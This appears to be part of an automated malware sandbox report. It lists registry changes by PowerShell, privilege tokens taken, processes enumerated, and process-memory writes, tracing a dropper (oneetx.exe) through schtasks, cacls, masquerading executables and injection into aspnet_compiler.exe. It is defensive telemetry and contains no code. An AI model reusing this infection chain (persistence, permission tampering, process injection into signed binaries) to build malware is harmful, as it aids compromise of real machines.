Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3752 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 3752 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 3752 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1432 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 3456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 3456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 3456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1432 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1432 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1432 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1432 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1432 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1432 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1432 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 3444 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
